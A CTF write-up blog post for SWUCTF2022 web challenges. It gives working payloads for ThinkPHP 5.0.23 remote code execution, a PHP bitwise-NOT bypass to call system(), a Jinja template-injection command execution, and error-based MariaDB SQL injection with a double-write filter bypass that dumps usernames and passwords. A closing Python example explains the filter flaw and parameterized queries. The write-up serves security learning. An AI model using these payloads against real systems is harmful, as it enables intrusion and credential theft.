
SWUCTF2022 Web Writeups | CTF
Notes on solving the SWU challenges. I'm such a noob, such a noob, sob.
THINKPHP?
?s=captcha
V5.0.23
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=env
PHP? Eval?
<?php
Bypass using bitwise NOT plus URL encoding
php -r "var_dump(urlencode(~'system'));" => string(18) "%8C%86%8C%8B%9A%92"
?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
Py?py
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag.txt').read()")}}
SQL? no sqlmap
Error-based injection
'or(updatexml(1,concat(0x7e,version(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%2C1%29%29%23
~10.3.18-MariaDB~
'or(updatexml(1,concat(0x7e,database(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2C1%29%29%23
~vaalacat~
'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28select%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23
select is filtered
Double-write bypass
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23
~vaala~
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(column_name))from(information_schema.columns)where(table_name)like('vaala')),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28column_name%29%29from%28information_schema.columns%29where%28table_name%29like%28%27vaala%27%29%29%2C0x7e%29%2C1%29%29%23
~id,username,password~
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(username,'~',password))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28username%2C%27~%27%2Cpassword%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23
'~vaala~flag{ccb506e8-afa0-46b8-b'
The updatexml error message is cut off after 32 characters, so the rest of the password is read with right():
'or(updatexml(1,concat(0x7e,(selselectect(group_concat((right(password,30))))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28%28right%28password%2C30%29%29%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23
'8-afa0-46b8-b177-e3a2fc5592b6}'
flag{ccb506e8-afa0-46b8-b177-e3a2fc5592b6}
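Why the double-write bypass works, and what stops it: the sketch below is an added example, not code from the original writeup or the challenge. It assumes the filter deletes the keyword in a single pass (the real filter is not shown on the page), and the users table and the input string are constructed.

```python
import re
import sqlite3

def strip_keyword_once(value: str) -> str:
    """Assumed filter: delete every 'select' in one pass, case-insensitively."""
    return re.sub(r"select", "", value, flags=re.IGNORECASE)

def make_db() -> sqlite3.Connection:
    # Constructed sample data, not the challenge's real table contents.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', 'constructed-secret')")
    return db

def lookup_filtered(db: sqlite3.Connection, username: str):
    """Weak form: blacklist filter, then string concatenation into the SQL text."""
    cleaned = strip_keyword_once(username)
    sql = "SELECT id FROM users WHERE username = '" + cleaned + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db: sqlite3.Connection, username: str):
    """Hardened form: the input is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT id FROM users WHERE username = ?", (username,)
    ).fetchall()

# Constructed input with the same doubled-keyword shape as in the writeup.
DOUBLED = "x' OR (selselectect count(*) from users) > 0 -- "

if __name__ == "__main__":
    db = make_db()
    # Removing the inner 'select' joins the outer halves back into the keyword.
    print(strip_keyword_once("selselectect"))
    # The filtered-and-concatenated query matches a row for a bogus username.
    print(lookup_filtered(db, DOUBLED))
    # The bound parameter is compared as a literal string and matches nothing.
    print(lookup_parameterized(db, DOUBLED))
```

Keyword stripping changes the input without removing its ability to alter the query structure; binding the value as a parameter removes that ability regardless of which keywords it contains.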
This is an original article, licensed under CC BY-NC-ND 4.0. When reproducing it in full, please credit 放养平凡.